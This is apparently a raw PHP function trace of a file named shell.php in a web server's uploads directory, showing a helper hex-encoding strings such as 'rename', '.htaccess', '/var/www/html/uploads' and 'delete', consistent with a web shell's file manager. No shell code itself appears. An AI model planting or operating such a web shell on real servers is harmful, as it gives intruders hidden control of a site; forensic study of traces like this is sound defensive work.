3 998 0 0.035227 484944 ord 0 /var/www/html/uploads/shell.php 19 1 'd'
3 998 1 0.035238 484984
3 998 R 100
3 999 0 0.035255 484944 dechex 0 /var/www/html/uploads/shell.php 19 1 100
3 999 1 0.035266 485016
3 999 R '64'
2 A /var/www/html/uploads/shell.php 19 $r .= '64'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1000 0 0.035295 484960 ord 0 /var/www/html/uploads/shell.php 19 1 's'
3 1000 1 0.035306 485000
3 1000 R 115
3 1001 0 0.035318 484960 dechex 0 /var/www/html/uploads/shell.php 19 1 115
3 1001 1 0.035329 485032
3 1001 R '73'
2 A /var/www/html/uploads/shell.php 19 $r .= '73'
2 A /var/www/html/uploads/shell.php 18 $i++
2 959 1 0.035358 484960
2 959 R '2f7661722f7777772f68746d6c2f75706c6f616473'
2 1002 0 0.035373 484880 hex 1 /var/www/html/uploads/shell.php 128 1 'rename'
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
3 1003 0 0.035403 484880 ord 0 /var/www/html/uploads/shell.php 19 1 'r'
3 1003 1 0.035414 484920
3 1003 R 114
3 1004 0 0.035426 484880 dechex 0 /var/www/html/uploads/shell.php 19 1 114
3 1004 1 0.035437 484952
3 1004 R '72'
2 A /var/www/html/uploads/shell.php 19 $r .= '72'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1005 0 0.035467 484912 ord 0 /var/www/html/uploads/shell.php 19 1 'e'
3 1005 1 0.035478 484952
3 1005 R 101
3 1006 0 0.035490 484912 dechex 0 /var/www/html/uploads/shell.php 19 1 101
3 1006 1 0.035502 484984
3 1006 R '65'
2 A /var/www/html/uploads/shell.php 19 $r .= '65'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1007 0 0.035531 484912 ord 0 /var/www/html/uploads/shell.php 19 1 'n'
3 1007 1 0.035542 484952
3 1007 R 110
3 1008 0 0.035554 484912 dechex 0 /var/www/html/uploads/shell.php 19 1 110
3 1008 1 0.035567 484984
3 1008 R '6e'
2 A /var/www/html/uploads/shell.php 19 $r .= '6e'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1009 0 0.035596 484912 ord 0 /var/www/html/uploads/shell.php 19 1 'a'
3 1009 1 0.035608 484952
3 1009 R 97
3 1010 0 0.035620 484912 dechex 0 /var/www/html/uploads/shell.php 19 1 97
3 1010 1 0.035631 484984
3 1010 R '61'
2 A /var/www/html/uploads/shell.php 19 $r .= '61'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1011 0 0.035660 484920 ord 0 /var/www/html/uploads/shell.php 19 1 'm'
3 1011 1 0.035670 484960
3 1011 R 109
3 1012 0 0.035683 484920 dechex 0 /var/www/html/uploads/shell.php 19 1 109
3 1012 1 0.035694 484992
3 1012 R '6d'
2 A /var/www/html/uploads/shell.php 19 $r .= '6d'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1013 0 0.035723 484920 ord 0 /var/www/html/uploads/shell.php 19 1 'e'
3 1013 1 0.035734 484960
3 1013 R 101
3 1014 0 0.035746 484920 dechex 0 /var/www/html/uploads/shell.php 19 1 101
3 1014 1 0.035758 484992
3 1014 R '65'
2 A /var/www/html/uploads/shell.php 19 $r .= '65'
2 A /var/www/html/uploads/shell.php 18 $i++
2 1002 1 0.035786 484920
2 1002 R '72656e616d65'
2 1015 0 0.035800 484880 hex 1 /var/www/html/uploads/shell.php 128 1 '.htaccess'
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
3 1016 0 0.035829 484880 ord 0 /var/www/html/uploads/shell.php 19 1 '.'
3 1016 1 0.035840 484920
3 1016 R 46
3 1017 0 0.035852 484880 dechex 0 /var/www/html/uploads/shell.php 19 1 46
3 1017 1 0.035864 484952
3 1017 R '2e'
2 A /var/www/html/uploads/shell.php 19 $r .= '2e'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1018 0 0.035893 484912 ord 0 /var/www/html/uploads/shell.php 19 1 'h'
3 1018 1 0.035904 484952
3 1018 R 104
3 1019 0 0.035916 484912 dechex 0 /var/www/html/uploads/shell.php 19 1 104
3 1019 1 0.035928 484984
3 1019 R '68'
2 A /var/www/html/uploads/shell.php 19 $r .= '68'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1020 0 0.035956 484912 ord 0 /var/www/html/uploads/shell.php 19 1 't'
3 1020 1 0.035968 484952
3 1020 R 116
3 1021 0 0.035980 484912 dechex 0 /var/www/html/uploads/shell.php 19 1 116
3 1021 1 0.035991 484984
3 1021 R '74'
2 A /var/www/html/uploads/shell.php 19 $r .= '74'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1022 0 0.036019 484912 ord 0 /var/www/html/uploads/shell.php 19 1 'a'
3 1022 1 0.036030 484952
3 1022 R 97
3 1023 0 0.036042 484912 dechex 0 /var/www/html/uploads/shell.php 19 1 97
3 1023 1 0.036054 484984
3 1023 R '61'
2 A /var/www/html/uploads/shell.php 19 $r .= '61'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1024 0 0.036083 484920 ord 0 /var/www/html/uploads/shell.php 19 1 'c'
3 1024 1 0.036094 484960
3 1024 R 99
3 1025 0 0.036106 484920 dechex 0 /var/www/html/uploads/shell.php 19 1 99
3 1025 1 0.036117 484992
3 1025 R '63'
2 A /var/www/html/uploads/shell.php 19 $r .= '63'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1026 0 0.036146 484920 ord 0 /var/www/html/uploads/shell.php 19 1 'c'
3 1026 1 0.036157 484960
3 1026 R 99
3 1027 0 0.036169 484920 dechex 0 /var/www/html/uploads/shell.php 19 1 99
3 1027 1 0.036180 484992
3 1027 R '63'
2 A /var/www/html/uploads/shell.php 19 $r .= '63'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1028 0 0.036208 484920 ord 0 /var/www/html/uploads/shell.php 19 1 'e'
3 1028 1 0.036219 484960
3 1028 R 101
3 1029 0 0.036231 484920 dechex 0 /var/www/html/uploads/shell.php 19 1 101
3 1029 1 0.036243 484992
3 1029 R '65'
2 A /var/www/html/uploads/shell.php 19 $r .= '65'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1030 0 0.036275 484920 ord 0 /var/www/html/uploads/shell.php 19 1 's'
3 1030 1 0.036287 484960
3 1030 R 115
3 1031 0 0.036299 484920 dechex 0 /var/www/html/uploads/shell.php 19 1 115
3 1031 1 0.036310 484992
3 1031 R '73'
2 A /var/www/html/uploads/shell.php 19 $r .= '73'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1032 0 0.036339 484928 ord 0 /var/www/html/uploads/shell.php 19 1 's'
3 1032 1 0.036350 484968
3 1032 R 115
3 1033 0 0.036362 484928 dechex 0 /var/www/html/uploads/shell.php 19 1 115
3 1033 1 0.036373 485000
3 1033 R '73'
2 A /var/www/html/uploads/shell.php 19 $r .= '73'
2 A /var/www/html/uploads/shell.php 18 $i++
2 1015 1 0.036401 484928
2 1015 R '2e6874616363657373'
2 1034 0 0.036416 485008 hex 1 /var/www/html/uploads/shell.php 128 1 '/var/www/html/uploads'
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
3 1035 0 0.036447 485008 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 1035 1 0.036458 485048
3 1035 R 47
3 1036 0 0.036470 485008 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 1036 1 0.036482 485080
3 1036 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1037 0 0.036511 485040 ord 0 /var/www/html/uploads/shell.php 19 1 'v'
3 1037 1 0.036523 485080
3 1037 R 118
3 1038 0 0.036535 485040 dechex 0 /var/www/html/uploads/shell.php 19 1 118
3 1038 1 0.036546 485112
3 1038 R '76'
2 A /var/www/html/uploads/shell.php 19 $r .= '76'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1039 0 0.036575 485040 ord 0 /var/www/html/uploads/shell.php 19 1 'a'
3 1039 1 0.036586 485080
3 1039 R 97
3 1040 0 0.036598 485040 dechex 0 /var/www/html/uploads/shell.php 19 1 97
3 1040 1 0.036609 485112
3 1040 R '61'
2 A /var/www/html/uploads/shell.php 19 $r .= '61'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1041 0 0.036639 485040 ord 0 /var/www/html/uploads/shell.php 19 1 'r'
3 1041 1 0.036650 485080
3 1041 R 114
3 1042 0 0.036662 485040 dechex 0 /var/www/html/uploads/shell.php 19 1 114
3 1042 1 0.036673 485112
3 1042 R '72'
2 A /var/www/html/uploads/shell.php 19 $r .= '72'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1043 0 0.036702 485048 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 1043 1 0.036713 485088
3 1043 R 47
3 1044 0 0.036725 485048 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 1044 1 0.036736 485120
3 1044 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1045 0 0.036765 485048 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 1045 1 0.036776 485088
3 1045 R 119
3 1046 0 0.036788 485048 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 1046 1 0.036799 485120
3 1046 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1047 0 0.036828 485048 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 1047 1 0.036839 485088
3 1047 R 119
3 1048 0 0.036852 485048 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 1048 1 0.036863 485120
3 1048 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1049 0 0.036892 485048 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 1049 1 0.036903 485088
3 1049 R 119
3 1050 0 0.036915 485048 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 1050 1 0.036926 485120
3 1050 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1051 0 0.036954 485056 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 1051 1 0.036965 485096
3 1051 R 47
3 1052 0 0.036977 485056 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 1052 1 0.036993 485128
3 1052 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1053 0 0.037022 485056 ord 0 /var/www/html/uploads/shell.php 19 1 'h'
3 1053 1 0.037033 485096
3 1053 R 104
3 1054 0 0.037046 485056 dechex 0 /var/www/html/uploads/shell.php 19 1 104
3 1054 1 0.037057 485128
3 1054 R '68'
2 A /var/www/html/uploads/shell.php 19 $r .= '68'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1055 0 0.037086 485056 ord 0 /var/www/html/uploads/shell.php 19 1 't'
3 1055 1 0.037097 485096
3 1055 R 116
3 1056 0 0.037109 485056 dechex 0 /var/www/html/uploads/shell.php 19 1 116
3 1056 1 0.037121 485128
3 1056 R '74'
2 A /var/www/html/uploads/shell.php 19 $r .= '74'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1057 0 0.037150 485056 ord 0 /var/www/html/uploads/shell.php 19 1 'm'
3 1057 1 0.037161 485096
3 1057 R 109
3 1058 0 0.037173 485056 dechex 0 /var/www/html/uploads/shell.php 19 1 109
3 1058 1 0.037184 485128
3 1058 R '6d'
2 A /var/www/html/uploads/shell.php 19 $r .= '6d'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1059 0 0.037213 485064 ord 0 /var/www/html/uploads/shell.php 19 1 'l'
3 1059 1 0.037225 485104
3 1059 R 108
3 1060 0 0.037237 485064 dechex 0 /var/www/html/uploads/shell.php 19 1 108
3 1060 1 0.037248 485136
3 1060 R '6c'
2 A /var/www/html/uploads/shell.php 19 $r .= '6c'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1061 0 0.037277 485064 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 1061 1 0.037288 485104
3 1061 R 47
3 1062 0 0.037318 485064 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 1062 1 0.037331 485136
3 1062 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1063 0 0.037361 485064 ord 0 /var/www/html/uploads/shell.php 19 1 'u'
3 1063 1 0.037372 485104
3 1063 R 117
3 1064 0 0.037384 485064 dechex 0 /var/www/html/uploads/shell.php 19 1 117
3 1064 1 0.037395 485136
3 1064 R '75'
2 A /var/www/html/uploads/shell.php 19 $r .= '75'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1065 0 0.037424 485064 ord 0 /var/www/html/uploads/shell.php 19 1 'p'
3 1065 1 0.037435 485104
3 1065 R 112
3 1066 0 0.037447 485064 dechex 0 /var/www/html/uploads/shell.php 19 1 112
3 1066 1 0.037458 485136
3 1066 R '70'
2 A /var/www/html/uploads/shell.php 19 $r .= '70'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1067 0 0.037487 485072 ord 0 /var/www/html/uploads/shell.php 19 1 'l'
3 1067 1 0.037497 485112
3 1067 R 108
3 1068 0 0.037510 485072 dechex 0 /var/www/html/uploads/shell.php 19 1 108
3 1068 1 0.037521 485144
3 1068 R '6c'
2 A /var/www/html/uploads/shell.php 19 $r .= '6c'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1069 0 0.037550 485072 ord 0 /var/www/html/uploads/shell.php 19 1 'o'
3 1069 1 0.037561 485112
3 1069 R 111
3 1070 0 0.037573 485072 dechex 0 /var/www/html/uploads/shell.php 19 1 111
3 1070 1 0.037584 485144
3 1070 R '6f'
2 A /var/www/html/uploads/shell.php 19 $r .= '6f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1071 0 0.037612 485072 ord 0 /var/www/html/uploads/shell.php 19 1 'a'
3 1071 1 0.037623 485112
3 1071 R 97
3 1072 0 0.037636 485072 dechex 0 /var/www/html/uploads/shell.php 19 1 97
3 1072 1 0.037647 485144
3 1072 R '61'
2 A /var/www/html/uploads/shell.php 19 $r .= '61'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1073 0 0.037676 485072 ord 0 /var/www/html/uploads/shell.php 19 1 'd'
3 1073 1 0.037687 485112
3 1073 R 100
3 1074 0 0.037699 485072 dechex 0 /var/www/html/uploads/shell.php 19 1 100
3 1074 1 0.037714 485144
3 1074 R '64'
2 A /var/www/html/uploads/shell.php 19 $r .= '64'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1075 0 0.037743 485088 ord 0 /var/www/html/uploads/shell.php 19 1 's'
3 1075 1 0.037754 485128
3 1075 R 115
3 1076 0 0.037766 485088 dechex 0 /var/www/html/uploads/shell.php 19 1 115
3 1076 1 0.037777 485160
3 1076 R '73'
2 A /var/www/html/uploads/shell.php 19 $r .= '73'
2 A /var/www/html/uploads/shell.php 18 $i++
2 1034 1 0.037806 485088
2 1034 R '2f7661722f7777772f68746d6c2f75706c6f616473'
2 1077 0 0.037823 485136 hex 1 /var/www/html/uploads/shell.php 128 1 '.htaccess'
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
3 1078 0 0.037853 485136 ord 0 /var/www/html/uploads/shell.php 19 1 '.'
3 1078 1 0.037864 485176
3 1078 R 46
3 1079 0 0.037876 485136 dechex 0 /var/www/html/uploads/shell.php 19 1 46
3 1079 1 0.037887 485208
3 1079 R '2e'
2 A /var/www/html/uploads/shell.php 19 $r .= '2e'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1080 0 0.037917 485168 ord 0 /var/www/html/uploads/shell.php 19 1 'h'
3 1080 1 0.037928 485208
3 1080 R 104
3 1081 0 0.037941 485168 dechex 0 /var/www/html/uploads/shell.php 19 1 104
3 1081 1 0.037953 485240
3 1081 R '68'
2 A /var/www/html/uploads/shell.php 19 $r .= '68'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1082 0 0.037982 485168 ord 0 /var/www/html/uploads/shell.php 19 1 't'
3 1082 1 0.037993 485208
3 1082 R 116
3 1083 0 0.038005 485168 dechex 0 /var/www/html/uploads/shell.php 19 1 116
3 1083 1 0.038016 485240
3 1083 R '74'
2 A /var/www/html/uploads/shell.php 19 $r .= '74'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1084 0 0.038045 485168 ord 0 /var/www/html/uploads/shell.php 19 1 'a'
3 1084 1 0.038056 485208
3 1084 R 97
3 1085 0 0.038069 485168 dechex 0 /var/www/html/uploads/shell.php 19 1 97
3 1085 1 0.038080 485240
3 1085 R '61'
2 A /var/www/html/uploads/shell.php 19 $r .= '61'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1086 0 0.038109 485176 ord 0 /var/www/html/uploads/shell.php 19 1 'c'
3 1086 1 0.038120 485216
3 1086 R 99
3 1087 0 0.038133 485176 dechex 0 /var/www/html/uploads/shell.php 19 1 99
3 1087 1 0.038144 485248
3 1087 R '63'
2 A /var/www/html/uploads/shell.php 19 $r .= '63'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1088 0 0.038173 485176 ord 0 /var/www/html/uploads/shell.php 19 1 'c'
3 1088 1 0.038184 485216
3 1088 R 99
3 1089 0 0.038196 485176 dechex 0 /var/www/html/uploads/shell.php 19 1 99
3 1089 1 0.038207 485248
3 1089 R '63'
2 A /var/www/html/uploads/shell.php 19 $r .= '63'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1090 0 0.038235 485176 ord 0 /var/www/html/uploads/shell.php 19 1 'e'
3 1090 1 0.038247 485216
3 1090 R 101
3 1091 0 0.038259 485176 dechex 0 /var/www/html/uploads/shell.php 19 1 101
3 1091 1 0.038271 485248
3 1091 R '65'
2 A /var/www/html/uploads/shell.php 19 $r .= '65'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1092 0 0.038300 485176 ord 0 /var/www/html/uploads/shell.php 19 1 's'
3 1092 1 0.038311 485216
3 1092 R 115
3 1093 0 0.038323 485176 dechex 0 /var/www/html/uploads/shell.php 19 1 115
3 1093 1 0.038334 485248
3 1093 R '73'
2 A /var/www/html/uploads/shell.php 19 $r .= '73'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1094 0 0.038362 485184 ord 0 /var/www/html/uploads/shell.php 19 1 's'
3 1094 1 0.038373 485224
3 1094 R 115
3 1095 0 0.038386 485184 dechex 0 /var/www/html/uploads/shell.php 19 1 115
3 1095 1 0.038397 485256
3 1095 R '73'
2 A /var/www/html/uploads/shell.php 19 $r .= '73'
2 A /var/www/html/uploads/shell.php 18 $i++
2 1077 1 0.038428 485184
2 1077 R '2e6874616363657373'
2 1096 0 0.038442 485264 hex 1 /var/www/html/uploads/shell.php 128 1 '/var/www/html/uploads'
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
3 1097 0 0.038474 485264 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 1097 1 0.038489 485304
3 1097 R 47
3 1098 0 0.038506 485264 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 1098 1 0.038518 485336
3 1098 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1099 0 0.038548 485296 ord 0 /var/www/html/uploads/shell.php 19 1 'v'
3 1099 1 0.038559 485336
3 1099 R 118
3 1100 0 0.038571 485296 dechex 0 /var/www/html/uploads/shell.php 19 1 118
3 1100 1 0.038583 485368
3 1100 R '76'
2 A /var/www/html/uploads/shell.php 19 $r .= '76'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1101 0 0.038612 485296 ord 0 /var/www/html/uploads/shell.php 19 1 'a'
3 1101 1 0.038623 485336
3 1101 R 97
3 1102 0 0.038635 485296 dechex 0 /var/www/html/uploads/shell.php 19 1 97
3 1102 1 0.038646 485368
3 1102 R '61'
2 A /var/www/html/uploads/shell.php 19 $r .= '61'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1103 0 0.038675 485296 ord 0 /var/www/html/uploads/shell.php 19 1 'r'
3 1103 1 0.038686 485336
3 1103 R 114
3 1104 0 0.038698 485296 dechex 0 /var/www/html/uploads/shell.php 19 1 114
3 1104 1 0.038710 485368
3 1104 R '72'
2 A /var/www/html/uploads/shell.php 19 $r .= '72'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1105 0 0.038738 485304 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 1105 1 0.038749 485344
3 1105 R 47
3 1106 0 0.038761 485304 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 1106 1 0.038773 485376
3 1106 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1107 0 0.038801 485304 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 1107 1 0.038812 485344
3 1107 R 119
3 1108 0 0.038824 485304 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 1108 1 0.038836 485376
3 1108 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1109 0 0.038864 485304 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 1109 1 0.038875 485344
3 1109 R 119
3 1110 0 0.038887 485304 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 1110 1 0.038898 485376
3 1110 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1111 0 0.038927 485304 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 1111 1 0.038938 485344
3 1111 R 119
3 1112 0 0.038950 485304 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 1112 1 0.038961 485376
3 1112 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1113 0 0.038989 485312 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 1113 1 0.039000 485352
3 1113 R 47
3 1114 0 0.039012 485312 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 1114 1 0.039024 485384
3 1114 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1115 0 0.039052 485312 ord 0 /var/www/html/uploads/shell.php 19 1 'h'
3 1115 1 0.039063 485352
3 1115 R 104
3 1116 0 0.039075 485312 dechex 0 /var/www/html/uploads/shell.php 19 1 104
3 1116 1 0.039087 485384
3 1116 R '68'
2 A /var/www/html/uploads/shell.php 19 $r .= '68'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1117 0 0.039116 485312 ord 0 /var/www/html/uploads/shell.php 19 1 't'
3 1117 1 0.039127 485352
3 1117 R 116
3 1118 0 0.039144 485312 dechex 0 /var/www/html/uploads/shell.php 19 1 116
3 1118 1 0.039156 485384
3 1118 R '74'
2 A /var/www/html/uploads/shell.php 19 $r .= '74'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1119 0 0.039185 485312 ord 0 /var/www/html/uploads/shell.php 19 1 'm'
3 1119 1 0.039196 485352
3 1119 R 109
3 1120 0 0.039208 485312 dechex 0 /var/www/html/uploads/shell.php 19 1 109
3 1120 1 0.039219 485384
3 1120 R '6d'
2 A /var/www/html/uploads/shell.php 19 $r .= '6d'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1121 0 0.039254 485320 ord 0 /var/www/html/uploads/shell.php 19 1 'l'
3 1121 1 0.039266 485360
3 1121 R 108
3 1122 0 0.039278 485320 dechex 0 /var/www/html/uploads/shell.php 19 1 108
3 1122 1 0.039289 485392
3 1122 R '6c'
2 A /var/www/html/uploads/shell.php 19 $r .= '6c'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1123 0 0.039318 485320 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 1123 1 0.039329 485360
3 1123 R 47
3 1124 0 0.039341 485320 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 1124 1 0.039353 485392
3 1124 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1125 0 0.039381 485320 ord 0 /var/www/html/uploads/shell.php 19 1 'u'
3 1125 1 0.039392 485360
3 1125 R 117
3 1126 0 0.039404 485320 dechex 0 /var/www/html/uploads/shell.php 19 1 117
3 1126 1 0.039415 485392
3 1126 R '75'
2 A /var/www/html/uploads/shell.php 19 $r .= '75'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1127 0 0.039444 485320 ord 0 /var/www/html/uploads/shell.php 19 1 'p'
3 1127 1 0.039455 485360
3 1127 R 112
3 1128 0 0.039468 485320 dechex 0 /var/www/html/uploads/shell.php 19 1 112
3 1128 1 0.039479 485392
3 1128 R '70'
2 A /var/www/html/uploads/shell.php 19 $r .= '70'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1129 0 0.039508 485328 ord 0 /var/www/html/uploads/shell.php 19 1 'l'
3 1129 1 0.039519 485368
3 1129 R 108
3 1130 0 0.039531 485328 dechex 0 /var/www/html/uploads/shell.php 19 1 108
3 1130 1 0.039542 485400
3 1130 R '6c'
2 A /var/www/html/uploads/shell.php 19 $r .= '6c'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1131 0 0.039571 485328 ord 0 /var/www/html/uploads/shell.php 19 1 'o'
3 1131 1 0.039582 485368
3 1131 R 111
3 1132 0 0.039594 485328 dechex 0 /var/www/html/uploads/shell.php 19 1 111
3 1132 1 0.039605 485400
3 1132 R '6f'
2 A /var/www/html/uploads/shell.php 19 $r .= '6f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1133 0 0.039634 485328 ord 0 /var/www/html/uploads/shell.php 19 1 'a'
3 1133 1 0.039645 485368
3 1133 R 97
3 1134 0 0.039657 485328 dechex 0 /var/www/html/uploads/shell.php 19 1 97
3 1134 1 0.039669 485400
3 1134 R '61'
2 A /var/www/html/uploads/shell.php 19 $r .= '61'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1135 0 0.039697 485328 ord 0 /var/www/html/uploads/shell.php 19 1 'd'
3 1135 1 0.039708 485368
3 1135 R 100
3 1136 0 0.039720 485328 dechex 0 /var/www/html/uploads/shell.php 19 1 100
3 1136 1 0.039731 485400
3 1136 R '64'
2 A /var/www/html/uploads/shell.php 19 $r .= '64'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1137 0 0.039760 485344 ord 0 /var/www/html/uploads/shell.php 19 1 's'
3 1137 1 0.039771 485384
3 1137 R 115
3 1138 0 0.039784 485344 dechex 0 /var/www/html/uploads/shell.php 19 1 115
3 1138 1 0.039795 485416
3 1138 R '73'
2 A /var/www/html/uploads/shell.php 19 $r .= '73'
2 A /var/www/html/uploads/shell.php 18 $i++
2 1096 1 0.039823 485344
2 1096 R '2f7661722f7777772f68746d6c2f75706c6f616473'
2 1139 0 0.039839 485264 hex 1 /var/www/html/uploads/shell.php 128 1 'delete'
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
3 1140 0 0.039873 485264 ord 0 /var/www/html/uploads/shell.php 19 1 'd'
3 1140 1 0.039885 485304
3 1140 R 100
3 1141 0 0.039897 485264 dechex 0 /var/www/html/uploads/shell.php 19 1 100
3 1141 1 0.039908 485336
3 1141 R '64'
2 A /var/www/html/uploads/shell.php 19 $r .= '64'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1142 0 0.039937 485296 ord 0 /var/www/html/uploads/shell.php 19 1 'e'
3 1142 1 0.039948 485336
3 1142 R 101
3 1143 0 0.039960 485296 dechex 0 /var/www/html/uploads/shell.php 19 1 101
3 1143 1 0.039971 485368
3 1143 R '65'
2 A /var/www/html/uploads/shell.php 19 $r .= '65'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1144 0 0.040001 485296 ord 0 /var/www/html/uploads/shell.php 19 1 'l'
3 1144 1 0.040012 485336
3 1144 R 108
3 1145 0 0.040024 485296 dechex 0 /var/www/html/uploads/shell.php 19 1 108
3 1145 1 0.040035 485368
3 1145 R '6c'
2 A /var/www/html/uploads/shell.php 19 $r .= '6c'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1146 0 0.040064 485296 ord 0 /var/www/html/uploads/shell.php 19 1 'e'
3 1146 1 0.040075 485336
3 1146 R 101
3 1147 0 0.040088 485296 dechex 0 /var/www/html/uploads/shell.php 19 1 101
3 1147 1 0.040099 485368
3 1147 R '65'
2 A /var/www/html/uploads/shell.php 19 $r .= '65'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1148 0 0.040127 485304 ord 0 /var/www/html/uploads/shell.php 19 1 't'
3 1148 1 0.040139 485344
3 1148 R 116
3 1149 0 0.040151 485304 dechex 0 /var/www/html/uploads/shell.php 19 1 116
3 1149 1 0.040163 485376
3 1149 R '74'
2 A /var/www/html/uploads/shell.php 19 $r .= '74'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1150 0 0.040191 485304 ord 0 /var/www/html/uploads/shell.php 19 1 'e'
3 1150 1 0.040238 485344
3 1150 R 101
3 1151 0 0.040252 485304 dechex 0 /var/www/html/uploads/shell.php 19 1 101
3 1151 1 0.040264 485376
3 1151 R '65'
2 A /var/www/html/uploads/shell.php 19 $r .= '65'
2 A /var/www/html/uploads/shell.php 18 $i++
2 1139 1 0.040294 485304
2 1139 R '64656c657465'
